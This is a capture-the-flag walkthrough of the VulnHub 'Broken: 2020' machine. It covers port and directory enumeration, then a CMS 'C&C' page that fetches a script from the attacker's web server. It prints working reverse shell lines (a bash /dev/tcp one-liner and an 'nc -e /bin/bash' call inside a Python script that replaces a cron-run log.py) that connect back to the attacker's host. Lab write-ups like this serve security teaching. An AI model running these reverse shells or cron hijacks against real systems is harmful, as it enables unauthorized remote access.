Updated: May 25
In this article we are going to solve another boot2root challenge Broken : 2020 . According to the vulnhub description getting user is of beginner level and getting root is of intermediate level .
IP of the target : 192.168.43.64
Now lets run nmap to find open ports and services running in the targeted system by using the command
sudo nmap -sC -sV -Pn 192.168.43.64
we have got only 2 ports . Okay lets enumerate the port 80.
we have a message with a nice background on port 80 :)
now we decided to run gobuster to find some files and directories that we can't find manually.
sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.43.64
we found two directories one is for fonts that is not going to be useful for us and another one is cms . lets checkout the /cms directory.
okay lets trust on this TrustMeCMS and press the install button ( may be we can hack into someone's computer)
After pressing the install button we have been redirected to a new webpage with some cool background.
Now we again checked the /cms directory if we have got something new there.
we have found our first flag . Now we again decided to run gobsuter to find directories or webpages inside the /cms directory using the command .
sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.43.64/cms/
we opened the /cms/cc webpage.
This clearly looks like a OS Command injection attack ( but it is not ) . So we decided to input some random IP and port and got some result on IP 220.127.116.11 and port 80.
But this is not useful for us . So we decided to run a simple HTTP Server using python.
sudo python -m SimpleHTTPServer 800
now we use the IP of our linux machine and port as 800 . Now lets check the response of C&C server.
it says that server can't reach the script . Now lets check our HTTP server if C&C server made any request.
okay so C&C server made a get request to a file that doesn't exist in our server.okay no problem we made a simple shell script with name specified in the request and content of that sh file is .
bash -c 'bash -i >& /dev/tcp/192.168.43.248/1234 0>&1'
save the file and again run the HTTP server and input the same IP and port in C&C Server , also open a listener on port 1234 using nc.
As we can see this time we have code 200 and lets check if we got the shell or not.
we are in as user www-data . Now lets enumerate more and more to get root.
we change our directory to /home and there we found a user alice . Lets check out the home directory of this user.
we have found our second flag and a file note.txt with a message from root . we change our directory /home/alice/script and there we found a python script.
Now we check the permission for directory /home/alice/script and found that this directory is writable . Means we can replace the log.py file with our reverse shell code ( keep the file name as log.py) and can have the shell of user alice because log.py is executed by the alice as cronjob.
first of all we change the original script name to .py.bak and now made a python script in our local machine with the code
import os import sys try: os.system('nc -e /bin/bash 192.168.43.248 1234') except Exception as e: print(e) sys.exit(1)
we changed the permission using chmod command and then started a listener on port 1234 using nc and after sometime we have the shell of user alice.
now we again checked the home directory of user alice and got something new this time .
message is very clear that we just need to write the path of any directory into path.txt file and rest of the work will be done by the bot. So we tried with path /root/ as echo '/root/' > path.txt
we checked that this time some new files are added may be these are of /root/ directory and yes we are right and we can read the content of flag.txt file .
and this is how we completed this challenge by reading the root flag!
NOTE : If you want to know how this thing (path.txt) is working then checkout the directory /back/ there you will find a script that will answer your all questions!